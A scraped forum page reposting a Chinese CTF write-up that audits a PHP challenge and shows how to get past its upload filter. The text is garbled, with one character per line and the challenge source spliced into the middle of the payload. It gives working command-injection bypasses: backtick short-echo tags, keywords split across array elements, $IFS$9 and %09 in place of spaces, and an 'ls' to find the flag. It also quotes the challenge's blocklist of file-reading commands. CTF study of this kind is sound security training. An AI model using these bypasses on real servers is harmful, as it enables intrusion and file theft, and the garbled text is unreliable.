论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
代码审计
[18625] 2021-05-12_一道简单ctf题目php代码审计
文档创建者:
s7ckTeam
浏览次数:
7
最后更新:
2025-01-18
代码审计
7 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2021-05-12_一道简单ctf题目php代码审计
一
道
简
单
c
t
f
题
目
p
h
p
代
码
审
计
原
创
h
e
r
e
4
0
4
h
e
r
e
4
0
4
2
0
2
1
-
0
5
-
1
2
打
开
题
目
地
址
,
直
接
是
源
代
码
,
考
察
代
码
审
计
一
个
题
目
,
具
体
源
码
如
,
小
伙
伴
们
可
以
具
体
测
试
阅
读
代
码
,
发
现
生
成
一
个
文
件
夹
,
当
a
c
t
i
o
n
参
数
为
p
w
d
时
候
,
打
印
该
路
径
。
当
a
c
t
i
o
n
为
u
p
l
o
a
d
,
且
存
在
d
a
t
a
参
数
,
对
d
a
t
a
参
数
进
行
过
滤
后
写
入
生
成
文
件
夹
下
的
i
n
d
e
x
.
p
h
p
文
件
。
首
先
是
过
滤
部
分
,
过
滤
了
较
多
参
数
,
包
括
空
格
,
分
号
,
p
h
p
等
,
无
法
直
接
写
入
p
h
p
一
句
话
或
者
其
他
木
马
。
本
人
较
菜
,
尝
试
了
好
多
都
是
失
败
。
最
终
想
到
了
<
?
=
?
>
形
式
。
接
下
来
就
是
考
虑
如
何
绕
过
c
h
e
c
k
函
数
的
检
查
内
容
了
。
查
看
c
h
e
c
k
函
数
过
滤
的
内
容
,
基
本
常
见
展
示
文
件
内
容
的
指
令
都
被
过
滤
了
。
关
于
显
示
文
件
内
容
可
以
使
用
的
指
令
方
案
1
#
因
为
参
数
可
以
是
数
据
,
因
此
可
以
通
过
将
关
键
字
拆
分
的
形
式
,
绕
过
单
个
参
数
的
过
滤
具
体
p
a
y
l
o
a
d
可
以
为
d
a
t
a
[
0
]
=
<
?
=
<
?
p
h
p
e
r
r
o
r
_
r
e
p
o
r
t
i
n
g
(
0
)
;
h
i
g
h
l
i
g
h
t
_
f
i
l
e
(
_
_
F
I
L
E
_
_
)
;
f
u
n
c
t
i
o
n
c
h
e
c
k
(
$
i
n
p
u
t
)
{
i
f
(
p
r
e
g
_
m
a
t
c
h
(
"
/
'
|
|
_
|
p
h
p
|
;
|
~
|
^
|
+
|
e
v
a
l
|
c
a
t
|
t
a
c
|
r
e
v
|
n
l
|
h
e
a
d
|
t
a
i
l
|
s
o
r
t
|
{
|
}
/
i
"
,
$
i
n
p
u
t
)
)
{
/
/
i
f
(
p
r
e
g
_
m
a
t
c
h
(
"
/
'
|
|
_
|
=
|
p
h
p
/
"
,
$
i
n
p
u
t
)
)
{
d
i
e
(
'
h
a
c
k
e
r
!
!
!
'
)
;
}
e
l
s
e
{
r
e
t
u
r
n
$
i
n
p
u
t
;
}
}
f
u
n
c
t
i
o
n
w
a
f
(
$
i
n
p
u
t
)
{
i
f
(
i
s
_
a
r
r
a
y
(
$
i
n
p
u
t
)
)
{
f
o
r
e
a
c
h
(
$
i
n
p
u
t
a
s
$
k
e
y
=
>
$
o
u
t
p
u
t
)
{
$
i
n
p
u
t
[
$
k
e
y
]
=
w
a
f
(
$
o
u
t
p
u
t
)
;
}
}
e
l
s
e
{
$
i
n
p
u
t
=
c
h
e
c
k
(
$
i
n
p
u
t
)
;
}
}
$
d
i
r
=
'
s
b
/
'
.
m
d
5
(
$
_
S
E
R
V
E
R
[
'
R
E
M
O
T
E
_
A
D
D
R
'
]
)
.
'
/
'
;
i
f
(
!
f
i
l
e
_
e
x
i
s
t
s
(
$
d
i
r
)
)
{
m
k
d
i
r
(
$
d
i
r
)
;
}
s
w
i
t
c
h
(
$
_
G
E
T
[
"
a
c
t
i
o
n
"
]
?
?
"
"
)
{
c
a
s
e
'
p
w
d
'
:
e
c
h
o
$
d
i
r
;
b
r
e
a
k
;
c
a
s
e
'
u
p
l
o
a
d
'
:
$
d
a
t
a
=
$
_
G
E
T
[
"
d
a
t
a
"
]
?
?
"
"
;
w
a
f
(
$
d
a
t
a
)
;
f
i
l
e
_
p
u
t
_
c
o
n
t
e
n
t
s
(
"
$
d
i
r
"
.
"
i
n
d
e
x
.
p
h
p
"
,
$
d
a
t
a
)
;
}
?
>
c
o
d
e
c
a
&
d
a
t
a
[
1
]
=
t
?
>
绕
过
c
h
e
c
k
部
分
关
键
字
的
过
滤
。
方
案
2
#
其
他
的
未
在
过
滤
部
分
的
指
令
举
例
如
m
o
r
e
等
空
格
的
绕
过
方
案
1
#
$
I
F
S
$
9
因
为
要
在
p
h
p
文
件
显
示
此
处
需
要
进
行
转
义
,
$
I
F
S
$
9
方
案
2
#
使
用
%
0
9
来
代
替
空
格
综
上
知
识
点
,
首
先
使
用
l
s
指
令
,
d
a
t
a
=
<
?
=
?
>
寻
找
f
l
a
g
文
件
,
然
后
利
用
显
示
文
件
内
容
的
方
法
获
取
具
体
内
容
。
l
s
%
0
9
/
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
代码审计